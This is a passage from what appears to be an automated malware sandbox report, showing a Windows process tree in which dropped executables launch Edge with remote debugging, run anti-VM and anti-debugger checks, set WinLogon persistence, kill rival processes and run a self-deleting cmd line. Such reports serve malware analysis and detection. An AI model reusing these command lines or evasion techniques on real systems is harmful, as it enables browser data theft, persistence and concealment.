        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3400 /prefetch:2
        8⤵
        
        PID:5196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3876 /prefetch:2
        8⤵
        
        PID:4032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3440 /prefetch:2
        8⤵
        
        PID:6904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4456 /prefetch:2
        8⤵
        
        PID:6852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4040 /prefetch:2
        8⤵
        
        PID:5908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:3876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        8⤵
        
        PID:6620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 /prefetch:3
        8⤵
        
        PID:6016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3040 /prefetch:8
        8⤵
        
        PID:1216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2412 /prefetch:2
        8⤵
        
        PID:3132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2416 /prefetch:2
        8⤵
        
        PID:5388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2400 /prefetch:2
        8⤵
        
        PID:5316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4292 /prefetch:2
        8⤵
        
        PID:7164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4276 /prefetch:2
        8⤵
        
        PID:4808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4468 /prefetch:2
        8⤵
        
        PID:3684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4408 /prefetch:2
        8⤵
        
        PID:6068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,279657586754970750,14934784772552268151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2440 /prefetch:2
        8⤵
        
        PID:6544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:1416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
        8⤵
        
        PID:4580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
        8⤵
        
        PID:7060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 /prefetch:8
        8⤵
        
        PID:3808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2508 /prefetch:2
        8⤵
        
        PID:4676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 /prefetch:2
        8⤵
        
        PID:4820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2620 /prefetch:2
        8⤵
        
        PID:2808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3368 /prefetch:2
        8⤵
        
        PID:6968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2604 /prefetch:2
        8⤵
        
        PID:7148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3576 /prefetch:2
        8⤵
        
        PID:3512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4088 /prefetch:2
        8⤵
        
        PID:5132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14394673899124325912,2926511301779018742,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4080 /prefetch:2
        8⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\r9rq1" & exit
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        Delays execution with timeout.exe
        
        PID:2732
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 972
        6⤵
        Program crash
        
        PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5264
    - - C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:6516
    - - C:\Users\Admin\AppData\Local\Temp\10003000101\42cec0179c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\42cec0179c.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1344
      - C:\Users\Admin\AppData\Local\Temp\10003000101\42cec0179c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\42cec0179c.exe"
        6⤵
        Executes dropped EXE
        
        PID:5108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 972
        6⤵
        Program crash
        
        PID:3936
    - - C:\Users\Admin\AppData\Local\Temp\10007590101\mbg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10007590101\mbg.exe"
        5⤵
        Executes dropped EXE
        
        PID:2716
      - C:\Users\Admin\AppData\Local\Temp\10007590101\mbg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10007590101\mbg.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7116
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "nvidia.exe"
        7⤵
        
        PID:6204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "nvidia.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6460
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "svdhost.exe"
        7⤵
        
        PID:6636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "svdhost.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5512
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "csrr.exe"
        7⤵
        
        PID:5284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "csrr.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5260
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "mnn.exe"
        7⤵
        
        PID:5392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "mnn.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5964
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "mme.exe"
        7⤵
        
        PID:6220
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "mme.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5308
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill.exe /F /IM "nnu.exe"
        7⤵
        
        PID:1796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill.exe /F /IM "nnu.exe"
        8⤵
